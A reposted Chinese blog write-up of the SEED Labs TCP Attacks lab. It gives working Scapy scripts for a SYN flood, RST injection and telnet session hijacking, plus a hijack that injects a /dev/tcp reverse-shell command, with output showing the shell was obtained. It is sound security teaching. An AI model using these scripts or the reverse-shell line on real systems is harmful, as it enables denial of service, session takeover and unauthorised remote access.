0
0

【SEED Labs 2.0】TCP Attacks Lab

本文为 SEED Labs 2.0 - TCP Attacks Lab 的实验记录。

文章目录

实验原理

TCP/IP 协议中的漏洞代表了协议设计和实现中一种特殊类型的漏洞;它们提供了宝贵的教训,说明为什么应该从一开始就设计安全性,而不是事后才添加。此外,研究这些漏洞有助于我们了解网络安全的挑战以及为什么需要许多网络安全措施。在本实验中,我们将对 TCP 进行多次攻击。本实验涵盖以下主题:

  • TCP 协议
  • TCP SYN 泛洪攻击和 SYN cookie
  • TCP 重置攻击
  • TCP 会话劫持攻击
  • shell 反弹

Task 1: SYN Flooding Attack

在这里插入图片描述

为方便观察,我们修改名称:

  1. # export PS1="\w victim-10.9.0.5$ "
  1. # export PS1="\w attacker-10.9.0.1$ "
  1. # export PS1="\w user1-10.9.0.6$ "

修改 dockerfile,给 victim 加上:

  1. privileged: true

Task 1.1: Launching the Attack Using Python

编写 

  1. synflood.py

  1. #!/bin/env python3from scapy.allimport IP, TCP, send
  2. from ipaddress import IPv4Address
  3. from random import getrandbits
  5. ip = IP(dst="10.9.0.5")
  6. tcp = TCP(dport=23, flags='S')
  7. pkt = ip/tcp
  9. whileTrue:
  10.     pkt[IP].src =str(IPv4Address(getrandbits(32)))# source iP
  11.     pkt[TCP].sport = getrandbits(16)# source port
  12.     pkt[TCP].seq = getrandbits(32)# sequence number
  13.     send(pkt, verbose =0)

查看当前 tcp 连接:

  1. victim-10.9.0.5$ netstat -nat
  2. Active Internet connections (servers and established)
  3. Proto Recv-Q Send-Q Local Address           Foreign Address         State      
  4. tcp        000.0.0.0:23              0.0.0.0:*               LISTEN     
  5. tcp        00127.0.0.11:41019        0.0.0.0:*               LISTEN

运行程序:

  1. attacker-10.9.0.1$ synflood.py

查看当前 tcp 连接:

  1. victim-10.9.0.5$ netstat -nat
  2. Active Internet connections (servers and established)
  3. Proto Recv-Q Send-Q Local Address           Foreign Address         State      
  4. tcp        000.0.0.0:23              0.0.0.0:*               LISTEN     
  5. tcp        00127.0.0.11:41019        0.0.0.0:*               LISTEN     
  6. tcp        0010.9.0.5:23             51.28.29.181:52204      SYN_RECV   
  7. tcp        0010.9.0.5:23             144.159.54.170:59931    SYN_RECV   
  8. tcp        0010.9.0.5:23             187.91.156.41:61074     SYN_RECV   
  9. ......
  10. victim-10.9.0.5$ netstat -tna |grep SYN_RECV |wc -l
  11. 97
  12. victim-10.9.0.5$ ss -n state syn-recv sport = :23 |wc -l
  13. 98

我们 telnet 

  1. 10.9.0.5

  1. user1-10.9.0.6$ telnet 10.9.0.5
  2. Trying 10.9.0.5...
  3. Connected to 10.9.0.5.
  4. Escape character is '^]'.
  5. Ubuntu 20.04.1 LTS
  6. 791656960e97 login: seed
  7. Password: 
  8. Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-54-generic x86_64)
  10.  * Documentation:  https://help.ubuntu.com
  11.  * Management:     https://landscape.canonical.com
  12.  * Support:        https://ubuntu.com/advantage
  14. This system has been minimized by removing packages and content that are
  15. not required on a system that usersdo not log into.
  17. To restore this content, you can run the 'unminimize' command.
  18. Last login: Mon Aug 29 06:36:20 UTC 2022 from user1-10.9.0.6.net-10.9.0.0 on pts/2

只稍微等了一下下,就连接上了。而我们之后再次连接,都是瞬间连接上。

第一次是因为,python 程序跑得不够快,其它用户总有机会抢过它。而之后能立即连接是因为,受害者主机记住了原来的连接。

Task 1.2: Launch the Attack Using C

我们首先清空一下:

  1. victim-10.9.0.5$ ip tcp_metrics flush

在宿主机编译:

  1. $ gcc -o synflood synflood.c
  2. $ chmod a+x synflood

然后运行:

  1. attacker-10.9.0.1$ synflood 10.9.0.5 23

查看当前 tcp 连接:

  1. victim-10.9.0.5$ netstat -nat
  2. Active Internet connections (servers and established)
  3. Proto Recv-Q Send-Q Local Address           Foreign Address         State      
  4. tcp        000.0.0.0:23              0.0.0.0:*               LISTEN     
  5. tcp        00127.0.0.11:41019        0.0.0.0:*               LISTEN     
  6. tcp        0010.9.0.5:23             111.55.219.82:27483     SYN_RECV   
  7. tcp        0010.9.0.5:23             249.195.34.103:34881    SYN_RECV   
  8. tcp        0010.9.0.5:23             148.11.56.119:17200     SYN_RECV   
  9. ......
  10. victim-10.9.0.5$ netstat -tna |grep SYN_RECV |wc -l
  11. 97
  12. victim-10.9.0.5$ ss -n state syn-recv sport = :23 |wc -l
  13. 98

telnet 

  1. 10.9.0.5

  1. user1-10.9.0.6$ telnet 10.9.0.5
  2. Trying 10.9.0.5...

可以看到,卡在这里不动了。

Task 1.3: Enable the SYN Cookie Countermeasure

我们首先清空一下:

  1. victim-10.9.0.5$ ip tcp_metrics flush

启动 syncookies:

  1. victim-10.9.0.5$ sysctl -w net.ipv4.tcp_syncookies=1
  2. net.ipv4.tcp_syncookies =1

启动程序:

  1. attacker-10.9.0.1$ synflood 10.9.0.5 23

查看当前 tcp 连接:

  1. victim-10.9.0.5$ netstat -nat
  2. Active Internet connections (servers and established)
  3. Proto Recv-Q Send-Q Local Address           Foreign Address         State      
  4. tcp        00127.0.0.11:34637        0.0.0.0:*               LISTEN     
  5. tcp        000.0.0.0:23              0.0.0.0:*               LISTEN     
  6. tcp        0010.9.0.5:23             55.22.243.45:18447      SYN_RECV   
  7. tcp        0010.9.0.5:23             118.13.9.120:28741      SYN_RECV   
  8. tcp        0010.9.0.5:23             32.34.55.0:57543        SYN_RECV   
  9. ......
  10. victim-10.9.0.5$ netstat -tna |grep SYN_RECV |wc -l
  11. 128
  12. victim-10.9.0.5$ ss -n state syn-recv sport = :23 |wc -l
  13. 129

telnet 

  1. 10.9.0.5

  1. user1-10.9.0.6$ telnet 10.9.0.5
  2. Trying 10.9.0.5...
  3. Connected to 10.9.0.5.
  4. Escape character is '^]'.
  5. Ubuntu 20.04.1 LTS
  6. 22c45e0a11e6 login: seed
  7. Password: 
  8. Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-54-generic x86_64)
  10.  * Documentation:  https://help.ubuntu.com
  11.  * Management:     https://landscape.canonical.com
  12.  * Support:        https://ubuntu.com/advantage
  14. This system has been minimized by removing packages and content that are
  15. not required on a system that usersdo not log into.
  17. To restore this content, you can run the 'unminimize' command.
  19. The programs included with the Ubuntu system are free software;
  20. the exact distribution terms for each program are described in the
  21. individual files in /usr/share/doc/*/copyright.
  23. Ubuntu comes with ABSOLUTELY NO WARRANTY, to the extent permitted by
  24. applicable law.

可以看到,尽管队列已经满了,但还是能正常连接。

Task 2: TCP RST Attacks on telnet Connections

在宿主机中查看网桥名称:

  1. $ ifconfig
  2. br-88413f1d34bf: flags=4163<UP,BROADCAST,RUNNING,MULTICAST>  mtu 1500
  3.         inet 10.9.0.1  netmask 255.255.255.0  broadcast 10.9.0.255
  4.         inet6 fe80::42:65ff:fef4:634e  prefixlen 64  scopeid 0x20<link>
  5.         ether 02:42:65:f4:63:4e  txqueuelen 0(Ethernet)
  6.         RX packets 4395661  bytes 193408492(193.4 MB)
  7.         RX errors 0  dropped 0  overruns 0  frame 0
  8.         TX packets 4821393  bytes 260362284(260.3 MB)
  9.         TX errors 0  dropped 0 overruns 0  carrier 0  collisions 0

编写 

  1. tcprst.py

  1. #!/usr/bin/env python3from scapy.allimport*defspoof_pkt(pkt):
  2.     ip = IP(src=pkt[IP].src, dst=pkt[IP].dst)
  3.     tcp = TCP(sport=23, dport=pkt[TCP].dport, flags="R", seq=pkt[TCP].seq+1)
  4.     pkt = ip/tcp
  5.     ls(pkt)
  6.     send(pkt, verbose=0)
  7.     
  8. f =f'tcp and src host 10.9.0.5'
  9. pkt = sniff(iface='br-88413f1d34bf',filter=f, prn=spoof_pkt)

运行程序:

  1. attacker-10.9.0.1$ tcprst.py

telnet 

  1. 10.9.0.5

  1. user1-10.9.0.6$ telnet 10.9.0.5
  2. Trying 10.9.0.5...
  3. Connected to 10.9.0.5.
  4. Escape character is '^]'.
  5. Ubuntu 20.04.1 LTS
  6. 22c45e0a11e6 login: sConnection closed by foreign host.

可以看出,连接直接被中断了。

Task 3: TCP Session Hijacking

编写 

  1. tcphijacking.py

  1. #!/usr/bin/env python3from scapy.allimport*defspoof_pkt(pkt):
  2.     ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
  3.     tcp = TCP(sport=pkt[TCP].dport, dport=23,
  4.               flags="A",
  5.               seq=pkt[TCP].ack, ack=pkt[TCP].seq+1)
  6.     data ="echo \"Fk U bitch!\" >> ~/hijacking.out\n\0"
  7.     pkt = ip/tcp/data
  8.     ls(pkt)
  9.     send(pkt, verbose=0)
  10.     
  11. f =f'tcp and src host 10.9.0.5'
  12. pkt = sniff(iface='br-88413f1d34bf',filter=f, prn=spoof_pkt)

telnet 

  1. 10.9.0.5

  1. user1-10.9.0.6$ telnet 10.9.0.5
  2. Trying 10.9.0.5...
  3. Connected to 10.9.0.5.
  4. Escape character is '^]'.
  5. Ubuntu 20.04.1 LTS
  6. 22c45e0a11e6 login: seed
  7. Password: 
  8. Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-54-generic x86_64)
  10.  * Documentation:  https://help.ubuntu.com
  11.  * Management:     https://landscape.canonical.com
  12.  * Support:        https://ubuntu.com/advantage
  14. This system has been minimized by removing packages and content that are
  15. not required on a system that usersdo not log into.
  17. To restore this content, you can run the 'unminimize' command.
  18. Last login: Mon Aug 2910:20:40 UTC 2022 from user1-10.9.0.6.net-10.9.0.0 on pts/2

运行程序:

  1. attacker-10.9.0.1$ tcphijacking.py

查看攻击效果:

  1. victim-10.9.0.5$ cat /home/seed/hijacking.out
  2. Fk U bitch!

可以看出,程序成功写入了一个文件。

Task 4: Creating Reverse Shell using TCP Session Hijacking

编写 

  1. reverseshell.py

  1. #!/usr/bin/env python3from scapy.allimport*defspoof_pkt(pkt):
  2.     ip = IP(src=pkt[IP].dst, dst=pkt[IP].src)
  3.     tcp = TCP(sport=pkt[TCP].dport, dport=23, flags="A", seq=pkt[TCP].ack, ack=pkt[TCP].seq+1)
  4.     data ="/bin/bash -i > /dev/tcp/10.9.0.1/9090 0<&1 2>&1\n\0"
  5.     pkt = ip/tcp/data
  6.     send(pkt, verbose=0)
  7.     
  8. f =f'tcp and src host 10.9.0.5'
  9. pkt = sniff(iface='br-88413f1d34bf',filter=f, prn=spoof_pkt)

在 attacker 上开启监听:

  1. attacker-10.9.0.1$ nc -lnv 9090
  2. Listening on 0.0.0.0 9090

telnet 

  1. 10.9.0.5

  1. user1-10.9.0.6$ telnet 10.9.0.5
  2. Trying 10.9.0.5...
  3. Connected to 10.9.0.5.
  4. Escape character is '^]'.
  5. Ubuntu 20.04.1 LTS
  6. 22c45e0a11e6 login: seed
  7. Password: 
  8. Welcome to Ubuntu 20.04.1 LTS (GNU/Linux 5.4.0-54-generic x86_64)
  10.  * Documentation:  https://help.ubuntu.com
  11.  * Management:     https://landscape.canonical.com
  12.  * Support:        https://ubuntu.com/advantage
  14. This system has been minimized by removing packages and content that are
  15. not required on a system that usersdo not log into.
  17. To restore this content, you can run the 'unminimize' command.
  18. Last login: Mon Aug 2910:54:18 UTC 2022 from user1-10.9.0.6.net-10.9.0.0 on pts/3

运行程序:

  1. attacker-10.9.0.1$ reverseshell.py

可以看到,成功拿到 victim 的 shell:

  1. attacker-10.9.0.1$ nc -lnv 9090
  2. Listening on 0.0.0.0 9090
  3. Connection received on 10.9.0.5 42462
  4. seed@22c45e0a11e6:~$ ip a
  5. ip a
  6. 1: lo: <LOOPBACK,UP,LOWER_UP> mtu 65536 qdisc noqueue state UNKNOWN group default qlen 1000
  7.     link/loopback 00:00:00:00:00:00 brd 00:00:00:00:00:00
  8.     inet 127.0.0.1/8 scope host lo
  9.        valid_lft forever preferred_lft forever
  10. 70: eth0@if71: <BROADCAST,MULTICAST,UP,LOWER_UP> mtu 1500 qdisc noqueue state UP group default 
  11.     link/ether 02:42:0a:09:00:05 brd ff:ff:ff:ff:ff:ff link-netnsid 0
  12.     inet 10.9.0.5/24 brd 10.9.0.255 scope global eth0
  13.        valid_lft forever preferred_lft forever

实验总结

本实验需要分清到底劫持的哪个报文,剩下的工作就很简单了。

标签: tcp/ip 网络 网络协议
本文转载自: https://blog.csdn.net/qq_39678161/article/details/126591811
版权归原作者 嗯嗯哈哈哈哈哈哈嗯嗯哈哈哈 所有, 如有侵权,请联系我们删除。
登录后发布评论

“【SEED Labs 2.0】TCP Attacks Lab”的评论:

还没有评论
关于作者
...
overfit同步小助手
文章同步
相关阅读

网络安全法-网络运行安全

使用selenium/drissionpage时如何阻止chrome自动跳转http到https

docker desktop 里部署的Open WebUI 管理员密码忘记了的处理方法

在ubuntu20.04中搭建onsite比赛运行环境

利用开源的低代码表单设计器FcDesigner高效管理和渲染复杂表单结构

Kafka学习笔记

【前端】浏览器输入url到页面呈现发生了什么?